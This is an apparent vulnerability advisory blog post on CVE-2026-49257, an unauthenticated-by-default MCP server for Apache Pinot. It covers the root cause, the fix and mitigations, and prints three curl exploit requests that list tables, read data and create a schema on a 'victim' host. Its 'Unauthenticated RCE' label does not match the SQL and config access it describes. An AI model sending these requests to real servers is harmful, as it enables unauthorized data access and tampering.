Listen to this Post
How CVE-2026-49257 Works
mcp-pinot is a Python-based Model Context Protocol (MCP) server for interacting with Apache Pinot. In versions 3.0.1 and below, the server defaults to running an HTTP MCP server bound to `0.0.0.0:8080` with no authentication enabled. This configuration exposes all 14 MCP tools—including SQL query execution, schema creation, and table-config mutation—to any network-adjacent caller.
The root cause is a combination of three insecure defaults. First, authentication is opt-in and defaults to off (oauth_enabled: bool = False). Second, the auth construction is gated by oauth_enabled; when it is false, `_auth` stays `None` and FastMCP registers all `@mcp.tool` endpoints with no authentication. Third, the default bind is all interfaces on a well-known port (host: str = "0.0.0.0", port: int = 8080). Any operator following the README’s HTTP transport instructions ends up with a network-reachable MCP server with no auth.
The server proxies these calls using server-side Pinot credentials loaded from environment variables (PINOT_TOKEN or PINOT_USERNAME/PINOT_PASSWORD), which is typically a privileged service account. This creates a confused-deputy condition: the MCP server effectively launders the caller’s lack of identity into the server’s privileges against the upstream cluster. An unauthenticated attacker can invoke `read_query` to execute arbitrary SELECT statements, `create_schema` to create or mutate schemas, `update_table_config` to modify table configurations, and even `reload_table_filters` to leak filter lists. The CVSS score is 10.0 Critical, with Attack Vector: Network, Attack Complexity: Low, Privileges Required: None, User Interaction: None, Scope: Changed, and High impact on Confidentiality, Integrity, and Availability.
The vulnerability was fixed in v3.1.0, released 2026-05-25, by changing the default HTTP bind host to 127.0.0.1, refusing non-loopback HTTP/HTTPS exposure unless OAuth is enabled, making Helm exposure opt-in and OAuth-gated, and adding parser-backed single-statement read-only validation for read_query.
DailyCVE Form:
Platform: mcp-pinot
Version: <=3.0.1
Vulnerability: Unauthenticated RCE
Severity: Critical (10.0)
date: 2026-05-23
Prediction: 2026-05-25
What Undercode Say:
Analytics:
- Default Exposure: Server binds to `0.0.0.0:8080` with
oauth_enabled=False. - Confused Deputy: Server-side credentials are reused for all requests.
- Attack Surface: All 14 MCP tools are exposed without authentication.
- CVSS: 10.0 Critical (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H).
Bash Commands & Codes:
1. Enumerate tables (no Authorization header)
curl -X POST http://victim:8080/mcp \
-H 'Content-Type: application/json' \
-d '{
"jsonrpc":"2.0",
"method":"tools/call",
"params":{"name":"list_tables","arguments":{}},
"id":1
}'
2. Read arbitrary table contents
curl -X POST http://victim:8080/mcp \
-H 'Content-Type: application/json' \
-d '{
"jsonrpc":"2.0",
"method":"tools/call",
"params":{
"name":"read_query",
"arguments":{"query":"SELECT FROM
<
table> LIMIT 100"}
},
"id":2
}'
3. Create a new schema (write privileges)
curl -X POST http://victim:8080/mcp \
-H 'Content-Type: application/json' \
-d '{
"jsonrpc":"2.0",
"method":"tools/call",
"params":{
"name":"create_schema",
"arguments":{
"schemaJson":"{\"schemaName\":\"attacker_schema\",\"dimensionFieldSpecs\":[{\"name\":\"id\",\"dataType\":\"STRING\"}]}"
}
},
"id":3
}'
Exploit:
An unauthenticated attacker can send crafted HTTP POST requests to the `/mcp` endpoint. By invoking the `read_query` tool, they can execute arbitrary SQL queries against the Pinot cluster using the server’s privileged credentials. Additionally, they can use create_schema, update_schema, create_table_config, and `update_table_config` to modify the cluster’s schema and table configurations, potentially leading to data corruption or denial of service. The `reload_table_filters` tool can also be abused to leak internal filter lists.
Protection:
- Upgrade to v3.1.0 immediately.
- If upgrading is not possible, set `MCP_HOST=127.0.0.1` to restrict the server to localhost only.
- Enable OAuth by setting `OAUTH_ENABLED=true` in the environment.
- Avoid exposing the server to untrusted networks without proper authentication.
- Implement network-level restrictions (e.g., firewall rules) to limit access to the MCP server port.
Impact:
Successful exploitation grants an attacker full read and write access to the configured Pinot cluster. This includes the ability to:
– Read any table data and cluster metadata.
– Create or update schemas and table configurations.
– Execute expensive queries that can degrade or disrupt cluster availability.
– Reload server filter files, leaking sensitive filter lists.
– Perform cluster diagnostics, revealing host, port, scheme, database, and auth-mode information.
The vulnerability is particularly dangerous because it requires no user interaction and no privileges, and it allows the attacker to pivot from the MCP server to the upstream Pinot cluster with the server’s own high-privilege credentials.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
